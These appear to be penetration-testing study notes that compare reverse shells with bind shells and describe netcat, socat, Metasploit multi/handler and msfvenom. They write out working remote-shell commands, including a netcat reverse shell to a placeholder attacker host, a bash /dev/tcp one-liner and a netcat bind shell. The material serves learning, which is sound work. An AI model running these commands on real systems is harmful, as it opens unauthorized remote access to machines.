Reverse Shells vs Bind Shells

Reverse Shell

  • The victim initiates the TCP connection back to the attacker

  • The attack box is listening on a specific port before the payload runs

    • nc -lvp <port>: -l listen, -v verbose, -p the local port to listen on

    • -e /bin/sh hands the connection to a shell; in a reverse shell this flag goes on the victim side (nc ATTACKER_IP PORT -e /bin/sh). Not every netcat build ships with -e (the OpenBSD variant omits it), which is one reason the bash one-liner below is popular

  • By far the most commonly used

  • Bash reverse shell command (needs a bash that was built with /dev/tcp support, which is the default on most Linux distributions)

    • bash -i >& /dev/tcp/0.0.0.0/4545 0>&1

    • Replace 0.0.0.0 with the attacker's IP; 4545 is the port the listener is on. -i starts an interactive shell, >& sends its stdout and stderr into the TCP connection, and 0>&1 reads its stdin from the same connection

Reverse Shell using netcat

Source: hackingtutorials.org

Bind Shell

  • The victim opens a listening port attached to a shell (nc -lvp <port> -e /bin/sh) and the attacker connects in to it

  • Useful when the attacker can reach the target directly but the target cannot make outbound connections (egress filtering blocks the callback a reverse shell would need)

  • Does not work when the victim sits behind NAT or an inbound firewall that drops the connection to the bound port; in that situation the connection has to originate from inside the target network, which is what a reverse shell does

Netcat Bind Shell

Source: hackingtutorials.org

Tools

  • Netcat

    • Used to manually perform all kinds of networking interactions, including things like banner grabbing during enumeration

    • Can be used to receive reverse shells and connect to remote ports attached to bind shells on a target system

    • Netcat shells are not a proper TTY: tab completion and job control do not work, and a stray Ctrl-C kills the whole session. They can be upgraded to a fully interactive shell by spawning a pseudo-terminal (for example with Python's pty module) and then fixing the terminal settings with stty

  • Socat

    • Like netcat on steroids

    • More stable than netcat shells out of the box

    • Two big catches:

      • The syntax is more difficult

      • Socat is rarely present on a target by default, whereas netcat is installed on almost every Linux distribution

  • Metasploit -- multi/handler

    • The exploit/multi/handler module of the Metasploit framework, used to receive reverse shells (set the PAYLOAD, LHOST and LPORT to match what the payload connects back to)

    • A fully-fledged way to obtain stable shells, with further options to improve the caught shell

    • The standard way to catch a Meterpreter session, and the easiest way to handle staged payloads, because the handler serves the second stage itself

  • Msfvenom

    • Used to generate payloads on the fly, for example a reverse or bind shell for a given target platform in a given output format

    • Can generate payloads other than reverse and bind shells; a staged payload generated here is normally caught with multi/handler rather than netcat
